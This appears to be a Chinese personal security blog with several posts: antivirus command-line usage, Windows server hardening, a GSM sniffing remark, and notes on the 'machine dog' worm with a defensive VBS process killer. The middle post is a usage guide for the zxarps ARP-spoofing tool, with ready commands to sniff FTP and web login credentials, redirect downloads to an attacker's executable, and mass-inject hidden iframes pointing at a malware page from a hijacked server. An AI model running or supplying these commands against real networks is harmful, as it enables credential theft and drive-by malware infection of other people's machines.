Lin's Space|Only

有时候不方便到界面下边或者为啦方便自己定制查杀病毒任务，这时命令行下的杀毒方式就显得很灵活实用啦（金山毒霸的屏保杀毒就是使用的命令行杀毒任务）。好啦下边看下金山毒霸查杀病毒命令格式。

C:\Program Files\Kingsoft\Kingsoft Internet Security 2008>kavdx /help

Kingsoft AntiVirus Scan V3.0     Copyright (c) 1998, 2003 Kingsoft Co., Ltd

Usage:
KAVDX [drive:][path][filename] [{/|-}<switch>[+|-] …]

Switch:          (+|-: Enable|Disable switch)
?|H|Help        – For help
D               – Display default settings
M               – Scan Memory
B               – Scan Boot area
All             – Scan All files
Z               – Scan archived file
S               – Scan Sub directory
HA              – Heuristic Analysis
A{P|C|D|S|Q}    – Automate {Prompt|Clean|Delete|Skip|Quarantine} infected fi
le(s)
BAK             – Backup infected file(s) before clean
Q               – Quarantine infected file(s) before clean
CF{D|S|Q}       – When Clean Failed, {Delete|Skip|Quarantine} infected file(
s)
L<LogName>      – Virus Log with VirusInfoID

Thank you for using KAVScan!

kavdx是金山的杀毒引擎命令可在2000/XP/Vista 的 DOS 窗口下运行，也可以在纯 DOS 环境下运行。

（其他主流杀毒软件也有相应的命令需要的话请自行查看说明文档）

C:\Program Files\Kingsoft\Kingsoft Internet Security 2008>kavdx /m /b d:\tools

Kingsoft AntiVirus Scan V3.0     Copyright (c) 1998, 2003 Kingsoft Co., Ltd

* Loading AntiVirus Engine…Ok
* AntiVirus Engine Version: 2008.1.14.15
* Loading Virus DataBase…OK!
* Virus Database Version: 2008.4.2.10

* Init AntiVirus Engine…Ok

* Scan Windows memory…
OK!
* Scan No.0 hard disk Master Boot Record…Ok!
* Scan D: disk boot sector…Ok!

* Scanning Directiories/Files…

* Checked Files: 8
* No Virus Found!

Thank you for using KAVScan!

上边这个例子就是扫描内存和引导区和d:\tools目录

若不带路径参数将使用默认的参数“/All-”（只扫描程序文件及文档文件）

默认参数是这样的：

C:\Program Files\Kingsoft\Kingsoft Internet Security 2008>kavdx /d

Kingsoft AntiVirus Scan V3.0     Copyright (c) 1998, 2003 Kingsoft Co., Ltd

Default Settings:
/M           : Scan Memory
/B           : Scan Boot area
/All-        : Only Scan program and document file
/Z-          : Disable Scan archived file(s)
/S           : Scan Sub directory
/HA-         : Disable Heuristic Analysis
/AP          : Prompt when found virus
/BAK-        : Disable Backup infected file(s) before clean
/Q-          : Disable Quarantine infected file(s) before clean
/CFS         : When Clean Failed, Skip infected file(s)

Thank you for using KAVScan!

看下中文的说明：

命令行格式：[路径]KAVDX [指定驱动器][指定路径][指定文件] [{/|-}<switch>[+|-] …]
+ 打开设置开关
- 关闭设置开关
无 （[指定驱动器][指定路径][指定文件]）时检查所有本地硬盘

switch（命令行转换参数）
?|H|Help 显示帮助信息
D 显示默认设置
M 扫描内存
B 扫描引导区
All 扫描所有文件
Z 检查压缩文件
ZC 清除压缩文件内文件所染病毒（只支持可清除的压缩格式）
S 扫描子目录
HA 启动启发式查毒
A{P|C|D|S|Q} 发现病毒{询问后处理|自动清除|自动删除|自动跳过|自动隔离}被感染的文件
BAK 清除病毒前备份被感染的文件
CF{D|S|Q} 当清除失败时自动{删除|跳过|隔离}被感染的文件

如果没有选择任何参数，程序会按默认值来进行查毒，默认的设置如下所示：
/M 扫描内存
/B 扫描引导区
/All- 只扫描程序文件及文档文件
/Z- 不扫描压缩文件中的文件
/S 扫描子目录
/HA- 不启动启发式查毒
/AP 发现病毒询问后处理
/BAK- 扫描子目录
HA 清除文件中的病毒时不备份原始的文件

今日一点, 安全 kavdx, 命令行, 金山毒霸

1：使用netstat -naob查看开启的服务，然后配置防火墙，然后启用。
2：services.msc检查服务启动情况。
Error Reporting Service
Microsoft Search
Wireless Configuration
3：设置组策略gpedit.msc

4:
Documents and Settings
Program files目录，为Common Files目录之外的所有目录赋予Administrators和SYSTEM有

完全控制权。
5:
at.exe
attrib.exe
cacls.exe
cmd.exe
debug.exe
format.com
ftp.exe
net.exe
net1.exe
netstat.exe
regedt32.exe
telnet.exe
scrrun.dll
shell.dll
拒绝guest用户组访问

iis网站全局配置
。。。
不安全组件：
regsvr32/u C:\WINDOWS\System32\wshom.ocx
rename C:\WINDOWS\System32\wshom.ocx ws.bak.hom.ocx.bak
regsvr32/u C:\WINDOWS\system32\shell32.dll
rename C:\WINDOWS\system32\shell32.dll shell.bak.32.dll

sql扩展存储，php模块

今日一点, 安全 安全配置, 服务器

说明：需要winPcap 基于arp欺骗，
具体功能看下面的使用说明

基于ARP欺骗的东东，可网页插马，DNS欺骗，自定义关键字嗅探等

网络地址信息：

0. Realtek RTL8139

IP Address. . . . . : 192.168.1.101

Physical Address. . : 00-11-D8-6B-5E-19

Default Gateway . . : 192.168.1.1

1. WAN (PPP/SLIP) Interface

IP Address. . . . . : xx.xx.xx.xx

Physical Address. . : 00-52-00-00-00-00

Default Gateway . . : xx.xx.xx.xx

options（参数说明）:

-idx [index] 网卡索引号

-ip [ip] 欺骗的IP,用’-'指定范围,’,'隔开

-sethost [ip] 默认是网关,可以指定别的IP

-port [port] 关注的端口,用’-'指定范围,’,'隔开,没指定默认关注所有端口

-reset 恢复目标机的ARP表

-hostname 探测主机时获取主机名信息

-logfilter [string]设置保存数据的条件，必须+-_做前缀,后跟关键字,

‘,’隔开关键字,多个条件’|'隔开

所有带+前缀的关键字都出现的包则写入文件

带-前缀的关键字出现的包不写入文件

带_前缀的关键字一个符合则写入文件(如有+-条件也要符合)

-save_a [filename] 将捕捉到的数据写入文件 ACSII模式

-save_h [filename] HEX模式

-hacksite [ip] 指定要插入代码的站点域名或IP,

多个可用’,'隔开,没指定则影响所有站点

-insert [html code]指定要插入html代码

-postfix [string] 关注的后缀名，只关注HTTP/1.1 302

-hackURL [url] 发现关注的后缀名后修改URL到新的URL

-filename [name] 新URL上有效的资源文件名

-hackdns [string] DNS欺骗，只修改UDP的报文,多个可用’,'隔开

格式: 域名|IP，www.aa.com|222.22.2.2,www.bb.com|1.1.1.1

-Interval [ms] 定时欺骗的时间间隔，默认是3秒

-spoofmode [1|2|3] 将数据骗发到本机,欺骗对象:1为网关,2为目标机,3为两者

-speed [kb] 限制指定的IP或IP段的网络总带宽,单位:KB

例子代码:

嗅探指定的IP段中端口80的数据，并以HEX模式写入文件

zxarps.exe -idx 0 -ip 192.168.0.2-192.168.0.50 -port 80 -save_h sniff.log

FTP嗅探,在21或2121端口中出现USER或PASS的数据包记录到文件

zxarps.exe -idx 0 -ip 192.168.0.2 -port 21,2121 -spoofmode 2 -logfilter “_USER ,_PASS” -save_a sniff.log

HTTP web邮箱登陆或一些论坛登陆的嗅探,根据情况自行改关键字

zxarps.exe -idx 0 -ip 192.168.0.2-192.168.0.50 -port 80 -logfilter “+POST ,+user,+pass” -save_a sniff.log

用|添加嗅探条件,这样FTP和HTTP的一些敏感关键字可以一起嗅探

zxarps.exe -idx 0 -ip 192.168.0.2 -port 80,21 -logfilter “+POST ,+user,+pass|_USER ,_PASS” -save_a sniff.log

如果嗅探到目标下载文件后缀是exe等则更改Location:为http://xx.net/test.exe

zxarps.exe -idx 0 -ip 192.168.0.2-192.168.0.12,192.168.0.20-192.168.0.30 -spoofmode 3 -postfix “.exe,.rar,.zip” -hackurl http://xx.net/ -filename test.exe

指定的IP段中的用户访问到-hacksite中的网址则只显示just for fun

zxarps.exe -idx 0 -ip 192.168.0.2-192.168.0.99 -port 80 -hacksite 222.2.2.2,www.a.com,www.b.com -insert “just for fun

arp欺骗批量挂马
zxarps.exe （ARP欺骗tool）

3389 肉鸡一台最好是服务器 或者内网机器命令： zxarps.exe -idx 0 -ip 192.168.0.2-192.168.0.99 -port 80 -insert “<iframe src=’xx’ width=0 height=0>”
这里网马地址就假设为 http://www.baidu.com/
那么命令就是zxarps.exe -idx 0 -ip 192.168.0.2-192.168.0.99 -port 80 -insert “<iframe src=’http://www.baidu.com/’ width=0 height=0>”
接着上 3389 服务器 服务器必须安装 winPcap.exe 工具都有打包然后就执行
zxarps.exe -idx 0 -ip 192.168.0.2-192.168.0.99 -port 80 -insert “<iframe src=’http://www.baidu.com/’ width=0 height=0>”
IP 自己改看看效果 ！！！！！ 绝对好用 自己试就知道了 这样挂马可是同网段好几个服务器的站基本都挂上你的马了只要别人访问这IP段中的某一个服务器上的站那么就自动欺骗插入我们的网马代码

防御办法：若为win系统推荐使用360arp防火墙

通用办法：对客户机和网关做双向ip-mac地址绑定，最好使用交换机替代集线器。

代码调试, 安全 arp欺骗, DNS欺骗, zxarps, 嗅探, 网页插马

先是看到国内的gsm服务商并没有加密数据通讯，又看到手机短信被嗅探窃看的截图（不是我抓得厄）

中国的GSM到底是不是加密的：http://hi.baidu.com/tombkeeper/blog/item/534571d9edcef22811df9bd2.html

手机打电话是可以窃听的?短信也同样？http://hi.baidu.com/tombkeeper/blog/item/49ac4043a14b15159213c636.html

人家移动老总不是说过嘛：“你是谁，你在哪里，我们都知道”。

。。。

安全 Phone sniffer, 嗅探, 手机

usrinit.exe

应该是最近闹得很火的机器狗病毒产生的假冒系统文件.可以直接中止,感染正常的系统文件userinit.exe不修改时间和大小只改文件内容。

usrinit.exe档案

W32.Kedebe.E@mm的一个组件

危害程度：蠕虫复制自身为系统文件夹下的[一个不可打印字符][文件名]，不可打印字符表示为0xA0，在不同操作系统下的显示不同，文件名为如下之一： nbtstat.exe、usrinit.exe、user.exe、winhlp32.exe、telnet.exe、locator.exe、 recover.exe、logman.exe、dlhost.exe、logonui.exe、winspol.exe、services.exe、 svchost.exe、lsas.exe、rundl32.exe、regedt32.exe、winlogon.exe、wuauclt.exe。在 记事本中打开临时文件夹下的[初始文件名].txt文件并显示如下文本：This document cannot be run under older versions. Please install latest version of Notepad. [随机文本]。从带有特定扩展名的文件中收集邮件地址，向收集到的地址发送自身副本。。试图终止带有某些文本的进程并删除相关文件以降低安全设置。向 hosts文件增加条目以阻止对一些与安全相关网站的访问。删除一些安全程序的文件！

阻止usrinit.exe

可以使用机器狗病毒的专杀工具（目前还没发现好用的专杀工具）建议是用免疫工具（超级巡警有个机器狗免疫程序），然后可以建立个开机运行脚本检查进程中是否有usrinit.exe进程，如果有就立即中止。
脚本类似：

wmic process where name=”userinit.exe” call terminate
wmic process where name=”usrinit.exe” call terminate
该代码的的意思是：当发现进程里有userinit.exe时，即关闭；当发现进程里有usrinit.exe时，也关闭。因为批处理在winlogon后运行，所以病毒刚启动，就被杀掉了。这样也就失去了下载其它病毒的机会。不过，缺点是它只运行一次。这两代批处理的基础上，加入了每秒检查进程，一发现即终止的vbs脚本：

do while(1)
strComputer = “.”
Set objWMIService = GetObject(”winmgmts:” _
& “{impersonationLevel=impersonate}!\\” & strComputer & “\root\cimv2″)

Set colProcessList1 = objWMIService.ExecQuery _
(”Select * from Win32_Process Where Name = ‘userinit.exe’”)
For Each objProcess1 in colProcessList1
objProcess1.Terminate()
Next

Set colProcessList2 = objWMIService.ExecQuery _
(”Select * from Win32_Process Where Name = ‘usrinit.exe’”)
For Each objProcess2 in colProcessList2
objProcess2.Terminate()
Next

Set colProcessList3 = objWMIService.ExecQuery _
(”Select * from Win32_Process Where Name = ‘conime0.exe’”)
For Each objProcess3 in colProcessList3
objProcess3.Terminate()
Next

Wscript.Sleep(1000)
Loop
这段vbs脚本的机制和以上两段代码有异曲同工之妙。不过，用了无限循环语句，实现了对进程的动态监控，使得被监控进程无法运行。

安全, 病毒学习, 网吧经验谈 explorer, userinit.exe, usrinit.exe, 机器狗

机器狗,应该是这个病毒吧c:\windows\linkinfo.dll文件，一直杀不掉，用超级巡警的机器狗免疫程序也貌似没用。360搞得死去活来，一直报阿报。

超级巡警干脆让系统死机（关于司机原因目前还不清楚是不是因为超级巡警，由于装拉超级巡警的机子无一例外的死机，到现在还没时间去仔细研究死因。）

这次作的新系统可能没有格盘的原因或这是我激活其他分区的病毒感染程序，刚做完就带病毒（系统看起来没啥问题），这次使用开机运行脚本驻留内存不断循环的查杀userinit.exe和usrinit.exe进程，还有开机就吧网络连接断开（因为linkinfo.dll是个下载者）或者开着360先暂时拦截着他下在其他更多的木马，然后用360修复系统漏洞，最好大全，欧一口气打啦112个漏洞，其中两个是在带有网络连接的安全模式下打的。

然后从下载好压缩包中解压微点主动防御软件装上然后升级重起，然后配置微点，由于批量的电脑等着用这个系统就最好用静默方式处理恶意程序和发现的病毒，并且处在内网，所以绑定拉网关防止arp攻击。

添加信任程序（需要提醒的是对于小的程序并且有压缩包的绿色程序建议重新解压下覆盖已经有的程序，因为这群病毒可能已经感染拉你的可执行程序exe文件）。

如果你不用微点，那么建议你无论如何也要做使用专业的杀软做一次全盘扫描（专业对于360和超级巡警应该不能考虑进来的说！！个人见解他们只是杀毒的辅助工具而已）。

然后该干啥干啥，偶接下来做的是优化系统，根据需要配置系统设置。

然后重起备份系统分区，刻盘测试。。

关于机子死因：
Read more…

今日一点, 安全, 病毒学习, 网吧经验谈 Arp, arp攻击, linkinfo.dll, userinit.exe, usrinit.exe, 机器狗, 母盘制作, 病毒